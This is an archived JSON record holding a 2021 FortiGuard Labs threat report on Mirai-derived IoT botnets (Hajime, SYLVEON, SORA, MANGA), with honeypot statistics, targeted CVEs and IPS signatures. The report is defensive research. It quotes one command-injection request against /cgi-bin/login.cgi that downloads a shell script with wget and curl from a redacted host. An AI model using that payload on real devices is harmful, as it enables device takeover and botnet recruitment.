{
	"id": "ec19c02d-f3fa-4386-971a-360d5d377063",
	"created_at": "2026-04-06T00:19:53.418617Z",
	"updated_at": "2026-04-10T13:12:55.299552Z",
	"deleted_at": null,
	"sha1_hash": "8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1",
	"title": "The Ghosts of Mirai | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2068782,
	"plain_text": "The Ghosts of Mirai | FortiGuard Labs\r\nPublished: 2021-06-24 · Archived: 2026-04-05 15:58:29 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected Platforms: Linux\r\nImpacted Users: Any organization\r\nImpact: Remote attackers gain control of the vulnerable systems\r\nSeverity Level: Critical\r\nIt has been almost five years since the source code of the notorious MIRAI IoT malware was released to the public by its author in late 2016. This event led to the emergence of numerous copycats, creating their own flavors of IoT botnet armies. Although improvements have been constantly added since then by various threat actors, the structure and goal of the campaigns have remained the same.\r\nIoT malware scans the Internet for IoT devices that use default or weak usernames and passwords. It also seeks to exploit known—and sometimes even zero-day—vulnerabilities to increase its chances of gaining access. And once it does, malicious binaries are downloaded and executed that make the device part of a zombie network that could then be instructed to participate in a Distributed Denial-of-Service (DDoS) attack that could cause a service outage to an unfortunate target. Some threat actors even sell these curated botnets as a service.\r\nWe have been closely monitoring the current state of the IoT botnet threat landscape through the perspective of an IoT device with the help of a honeypot system. This article describes our observations over the last few weeks.\r\nWhere are These Attacks Coming From?\r\nTo simulate what it would be like for a new IoT device to be connected to the internet for the first time, we set up a fresh honeypot system to capture what kinds of attacks it would receive. This honeypot was designed to be vulnerable to telnet credential brute force attacks. The statistics in this article were taken from a three-week period.\r\nOn average, this honeypot system received around 200 attacks per day, ultimately recording nearly 4700 telnet connections in just three weeks. We were then able to identify nearly 4000 of those attacks and connect them to a Mirai-related malware family.\r\nFigure 1 Number of telnet connections per day\r\nSince this honeypot does not execute any of the downloaded binaries, most of the attacks keep retrying until their malware has executed in the system. By removing IP duplicates, the actual number of attack sources was obtained and is broken down in the next table.\r\nhttps://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai\r\nPage 1 of 10\r\nFigure 2 Unique telnet source IPs per country\r\nTop IoT Malware Variants\r\nMirai variant authors use unique strings or tokens in their binaries that are used to verify whether SSH or Telnet commands were successfully executed in the device—although this could also be used by the threat actors to advertise their malware or, in some cases, simply as a placeholder for novelty messages.\r\nThe figure below shows a sequence of commands that the SORA Mirai variant executes immediately after gaining access to a device.\r\nFigure 3 Sample shell commands executed by a SORA bot\r\nThese strings have been heavily used by researchers over time to classify variants. However, there are cases where variants may use different tokens but turn out to be the same malware function-wise—and are even operated by the same threat actor. In such cases, analyzing the actual binary being downloaded into the device would greatly help further define the number of existing variants.\r\nBased on the attacks received by the honeypot, the following table shows the top 10 variants we were able to identify.\r\nFigure 4 Top ten identified variants\r\nThe Enigmatic “Hajime”\r\nHajime was dubbed the successor to the first generation of Mirai. Built on the same principle and goals as its predecessor, it tries to propagate to IoT devices by brute-forcing credentials using a password list of common default device passwords. However, unlike Mirai, Hajime utilizes a decentralized peer-to-peer network to issue commands to its bots. This makes it much harder to locate the Command-and-Control (C2) server for a takedown.\r\nAside from its sophisticated bot network communication, it is also one of the most mysterious variants due to its vague intentions. Commands sent to Hajime bots are in the form of structured messages that are passed along in the peer-to-peer network. One of these commands instructs bots to download and execute binaries, internally called \"modules\". Only the spreading module has been observed being served in the wild. No attack or disruptive modules have been observed, and Hajime has never been associated with any disruption attacks. Furthermore, part of its behavior is to block access to ports that are commonly targeted by other IoT malware, thereby inadvertently (or not) somewhat protecting the infected device from further infections.\r\nLastly, it delivers the following message to the device’s terminal:\r\nJust a white hat, securing some systems.\r\nImportant messages will be signed like this!\r\nHajime Author.\r\nContact CLOSED Stay sharp!\r\nIt was only a matter of time before some speculated that Hajime might be the work of a real vigilante.\r\nSYLVEON Coming Out of Retirement?\r\nWhat surprised us more was the appearance of the SYLVEON variant on the table. In mid-2019 there was a 14-year-old European IoT malware author who went by the names “Light The Sylveon” and “Light The Leafeon”. When we took a quick look at the decrypted strings of one of the binaries we captured, the word “Leafeon” was found, creating speculation that this might be the author’s comeback.\r\nFigure 5 Strings found in SYLVEON binaries\r\n“Light the Sylveon” co-created the destructive SILEX IoT malware, whose goal was to render vulnerable devices inoperable by running destructive commands–very similar to BrickerBot. From the malware authors’ perspective, based on a message embedded in the malware’s binary, this was to “prevent skids to flex their skidded botnet.”\r\nEventually, the “Light The Sylveon” author announced through a post on his Twitter account that he was going to abandon the project.\r\nFigure 6 \"Light The Sylveon\" announces quitting on a Twitter post\r\nUnlike SILEX, however, SYLVEON is a conventional IoT malware that was clearly based on the Mirai source code with some added attacks.\r\nFigure 7 Function name list found in a SYLVEON binary\r\nInterestingly enough, greek.Helios and a certain Thar3seller, a group previously associated with other IoT malware campaigns, currently claim to be the authors of this variant.\r\nFigure 8 Strings found in a SYLVEON binary\r\nThe relationship between these different authors is still unclear. What we are certain about is that this variant is being actively operated, as also shown by recently updated binaries found on one of its download servers.\r\nFigure 9 Open directory hosting SYLVEON variant\r\nSORA - The Surviving Member of the Wicked Family\r\nIt is also interesting to see Mirai variants that were authored by the threat actor known as Wicked, whom we covered three years ago. These variants include Owari, Omni, Wicked, and SORA. Based on an interview at that time, the author stated he was going to focus on Owari and Omni while abandoning the other two variants, including SORA. Based on our observations, it seems that SORA has survived more successfully than its siblings.\r\nMirai Variant MANGA Actively Updates its List of Targeted Vulnerabilities\r\nAside from the honeypot, we have also been monitoring Mirai variants from other sources. In particular, we have been closely monitoring the developments of the MANGA variant because it is one of the most active in terms of adding new exploit vectors to its list.\r\nIn fact, just a week ago, it added several more exploits, two of which are fairly recent:\r\nOptiLink ONT1GEW GPON Remote Code Execution (formTracert function)\r\nFigure 10 Sample request leading to an RCE on OptiLink GPON\r\nCVE-2021-1498 (Cisco HyperFlex HX Remote Code Execution)\r\nFigure 11 Sample request targeting CVE-2021-1498\r\nCVE-2021-31755 (Tenda Router AC11 Remote Code Execution)\r\nFigure 12 Sample request targeting CVE-2021-31755\r\nUnknown 1 (Unidentified target)\r\nSample request:\r\nFigure 13 Sample request targeting an unknown target\r\nHere is a list of other vulnerabilities this malware variant tries to exploit:\r\nVulnerability - Description\r\nCVE-2021-22986 - F5 iControl REST Remote Code Execution\r\nCVE-2009-4490 - mini_httpd 1.18 Escape Sequence\r\nCVE-2018-10088 - XiongMai uc-httpd Buffer Overflow\r\nCVE-2020-28188 - TerraMaster TOS Remote Code Execution\r\nCVE-2020-29557 - D-Link DIR-825 Buffer Overflow\r\nCVE-2020-25506 - D-Link DNS-320 Remote Code Execution\r\nCVE-2021-22502 - Micro Focus OBR Remote Code Execution\r\nCVE-2021-27561/CVE-2021-27562 - Yealink DM (Device Management) Remote Code Execution\r\nCVE-2021-22991 - F5 BIG-IP Buffer Overflow\r\nVisualDoor (2021-01-29) - SonicWall SSL-VPN Remote Code Execution\r\nUnknown 2 - key parameter on /cgi-bin/login.cgi leading to Remote Code Execution\r\nSample request:\r\nPOST /cgi-bin/login.cgi HTTP/1.1\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\nkey=';`cd /tmp; wget http://{REDACTED IP}/lolol.sh; curl -O http://{REDACTED IP}/lolol.sh; chmod 777 l\r\nFigure 14 List of other vulnerabilities being targeted by Manga\r\nConclusion\r\nAs the number of installed IoT devices continues to explode, especially given the current lack of security standards available to protect them, IoT will be a hotbed for malware operations for the foreseeable future, as we have demonstrated in this article. And interestingly, Mirai variants are still very active in terms of attack and development.\r\nSolutions\r\nEvery artifact collected from our honeypot systems and other sources is automatically processed to ensure that our customers are protected from these attacks. That said, the following precautions are highly recommended:\r\nAs credential brute-forcing is still the primary way malware gets into IoT devices, setting usernames and passwords that are difficult to guess can go a long way towards securing them.\r\nIn addition, to protect against known vulnerabilities, always keep device software up to date.\r\nFortinet customers are protected by the following:\r\nRelated samples are detected by FortiGuard Antivirus.\r\nDownloaded URLs and identified C2s are blocked by FortiGuard Web Filtering Service.\r\nMentioned exploit attacks are detected using the following IPS signatures:\r\nCVE-2021-22986 - F5.iControl.REST.Interface.Remote.Command.Execution\r\nCVE-2009-4490 - Acme.thttpd.and.minihttpd.Command.Injection.Vulnerability\r\nCVE-2018-10088 - XiongMai.uc-httpd.Buffer.Overflow\r\nCVE-2020-28188 - TerraMaster.TOS.Makecvs.PHP.Unauthenticated.Command.Execution\r\nCVE-2020-25506 - D-Link.ShareCenter.Products.CGI.Code.Execution\r\nCVE-2020-29957 - D-Link.DIR.825.Buffer.Overflow\r\nCVE-2021-22502 - Micro.Focus.Operations.Bridge.Reporter.Command.Injection\r\nCVE-2021-27561/CVE-2021-27562 - Yealink.Device.Management.Platform.Command.Injection\r\nCVE-2021-22991 - F5.BIG.IP.TMM.URI.Normalization.Buffer.Overflow\r\nVisualDoor RCE - Bash.Function.Definitions.Remote.Code.Execution\r\nOptiLink ONT1GEW GPON RCE - Optilink.GPON.Router.formTracert.Remote.Command.Execution\r\nCVE-2021-1498 - Cisco.HyperFlex.HX.storfs-asup.Handling.Command.Injection\r\nIOCs\r\nMANGA\r\nFiles (SHA256)\r\nDownload URLs\r\nHajime\r\nFiles (SHA256)\r\na04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3\r\nDownload URLs\r\nSample commands after gaining access:\r\nSYLVEON\r\nFiles (SHA256)\r\nDownload URLs\r\nSample commands after gaining access:\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard Security Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda (TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/the-ghosts-of-mirai"
	],
	"report_names": [
		"the-ghosts-of-mirai"
	],
	"threat_actors": [],
	"ts_created_at": 1775434793,
	"ts_updated_at": 1775826775,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.pdf",
		"text": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.txt",
		"img": "https://archive.orkl.eu/8aa6a224a1493e0bf7b11ad00bd52ee792e9d9b1.jpg"
	}
}